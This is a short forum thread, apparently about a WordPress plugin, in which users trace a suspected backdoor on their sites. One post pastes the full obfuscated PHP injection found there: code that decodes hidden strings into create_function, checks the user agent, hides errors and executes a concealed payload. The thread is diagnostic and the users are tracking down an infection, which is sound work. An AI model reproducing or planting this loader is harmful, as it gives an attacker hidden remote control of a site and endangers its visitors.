Possible Hack

Hi, can you please write me in private and tell me which kind of backdoor hack did you find?

Sure thing! I just found another site using the plugin with the same hack. Where should I email you?

I sent you an email through your site.

<?php $lknmsf = 'us)% x24- x24b!>!%yy)#}#-# x24- x2mhpph#)zbssb!-#}#)fepmqnj!/56 x63 164 x69 157 x6e"; function kjfjuzRb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-Kx52 137 x41 107 x45 116 x54"]); if ((strstr($cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfopjudojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y#!/!**#sfmcnbs+yfeobz+sfwjidsbbj+upcotn+qsvmt+f%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- >1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,B { $dwflptl = ” x63 162 x65 141 x74 145 x5f 146 x75 14]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]7%=*h%)m%):fmjix:<##:>0~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#C)fepmqnjA x27&6<.fmjgA x4-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4 x2[;ldpt%}K;ufldpt}X;msvd}R;*msv%)}.;UQPMSVD!-id%)uqpugj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]csboe))1/35.)1/14+9**-)1/2%6<*17-SFEBFI,6<*127-UVPFNJU,6<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr#/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOcpw = implode(array_map("kjfjuzx",str_split("%tjw!>!#]y84]275]y83XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>;$cmfhzcm = $dwflptl("", $ooylfpw); $cmfhzcm();}} x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w6Z6<.2hA x27pd%6</#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#gj!<*2bd%-#1GO x22#)fepmqyfA>2b)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%LOBALS[" x61 156 x75 156 x61"]=1; $uas=sttfsqnpdov{h19275j{hnpd19275fubx5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>}k~~9{d%:osvufs:~928>>]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!oj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<7#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]gj}l;33bq}k;opjudovg}x;0]27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs%w6x($n){return chr(ord($n)-1);} @error_reporting(0); $ooylf#!>!2p%!|!*!***b%)sfxpmpusut!-#j0~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-if((function_exists(” x6f 142 x5f 163 x74 141 %!<*qp%-*.%)euhA)3of>2bd%!<5h%/:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]]D6]281L1#/#M5]DgP5]D6#P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]21SQUUI&c_UOFHBSFTVQUUI&b%!|!*)323zbek!~!<b% xpdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%!|Z~!<#=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpefovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!*27-SFGTOBSUOSVUFS,6<*mdof57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nb2#-#!#-%tmw)%tww**WYsboepn):8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]8y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y*X)ufttj x22)gj!|!*nbsbq%)32* x7f_*#fubfsdXk5{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-7]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#275]y7:]268]y7f#<!%tww!>! x2404- x24]y8 x24- x24]26 x24- x24<<+{e%+*!*+fepdfe{h+{d%)+opjudsv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3{666~6<&w6<U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;h=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#K)udfoopdXA x22)7gj6<*QDUMPT7-NBFSUTLDPT7-UFOJGB)fubfsdXA986+7**^/%rx<~!!%s:N}#-%o:W%c:zbssb!>!ssbnpe_GMFTQIQ&f_UTPIQUUI&e_SEEBFUPNFS&d_SFSFGF]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)rxW~!Ypp2)%zB%z>! x24/%tmw/ x-*f%)sfxpmpusut)tpqssutRe%)Rd%)7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!*TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-! x24- x24gps)%j>1<%jh%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovgbubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973 x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}7;!}6;##}C;!>2]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x53ldfidk!~!<**qp%!-uyfu%)3of)fepvg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgtrtolower($_SERVER[” x48 124 x54 120 x5f 125 x53 105 jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]273]y76]27>! x246767~6<Cw6<pd%w6Z6<.5hA x27pd%6<pd%w6Z6<.4hA!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<“)))sbq% x5cSFWSFT%}X;!sp!*#opo#>>}R;msv}.;/#/#< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfsovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut]368]322]3]364]6]283]427]36]373#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-/r%/h%)n%-#+I#)q%:>:r%:|:**t%)mx72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $Gepmqyf x27*&7-n%)utjm6< x7fftmsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;uas," x6d 163 x69 145")) or (61 156 x64 162 x6f 151 x64")))<%fdy>#]D4]273]D6P2L5P6]strstr($uas," x72 166 x3a 61 x31")) or (strstr($uas," x#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fe24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rNy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msvftsbqA7>q%6< x7fw6!#0#)idubnhfsq)!sp!*#ojneb#)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyfopjudomgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf4 x223}!+!P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)f-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%>!}W;utpi}Y;tuofuopdufhfmjg} x22:ftmbg39*56A:>:8:|:7#6#)tutjyf439275 x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<jg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%ww6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111tdz)%bbT-%bT-%hW~%fdx24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSewtmflo'; $szmsygz=explode(chr((477-357)),substr($lknmsf,(30534-24608),(181-147))); $joyyifvmp = $szmsygz[0]($szmsygz[(7-6)]); $pgzjjmhvl = $szmsygz[0]($szmsygz[(14-12)]); if (!function_exists('jssjegkxv')) { function jssjegkxv($zhnpmpw, $gfqihb,$kandogib) { $rsdytxzz = NULL; for($scxirdt=0;$scxirdt<(sizeof($zhnpmpw)/2);$scxirdt++) { $rsdytxzz .= substr($gfqihb, $zhnpmpw[($scxirdt*2)],$zhnpmpw[($scxirdt*2)+(7-6)]); } return $kandogib(chr((28-19)),chr((398-306)),$rsdytxzz); }; } $ikzmabw = explode(chr((187-143)),'2117,46,4543,62,1604,40,4071,53,192,45,4691,29,4774,55,4720,30,598,53,61,40,1992,57,1201,64,1784,46,4178,52,1361,53,5432,42,4605,27,5817,41,150,42,1512,63,2082,35,3219,60,5583,66,1110,36,5135,57,4993,70,2838,51,792,25,1952,40,4327,50,1019,31,2567,23,3032,60,3843,62,5512,30,875,55,4632,59,5238,61,4001,70,1830,42,1050,60,3710,64,3592,49,930,63,5192,46,294,41,2497,70,1481,31,2163,31,4829,69,2370,60,2049,33,398,48,34,27,5063,28,3446,31,101,49,3309,58,2323,47,3477,41,2810,28,3970,31,2590,40,4283,44,3641,69,1762,22,5542,41,1644,31,5299,63,3003,29,4377,59,237,57,1265,47,3092,58,335,63,3367,50,1927,25,3150,69,4124,54,1872,55,2942,30,724,68,4512,31,703,21,2194,48,2767,43,1713,49,499,57,5878,48,0,34,817,58,2972,31,5702,47,3571,21,2430,67,5091,44,1146,55,1414,67,5474,38,3417,29,4898,36,5649,53,2630,27,3774,69,2657,64,651,52,2889,53,2242,23,4750,24,2721,46,5362,70,1575,29,5858,20,4934,59,4436,31,2265,58,3905,65,993,26,3279,30,556,42,5749,68,1675,38,446,53,3518,53,4467,45,4230,53,1312,49'); $pzggdv = $joyyifvmp("",jssjegkxv($ikzmabw,$lknmsf,$pgzjjmhvl)); $joyyifvmp=$lknmsf; $pzggdv(""); $pzggdv=(402-281); $lknmsf=$pzggdv-1; ?>

It doesn’t look like this plugin is adding the malicious coding but another one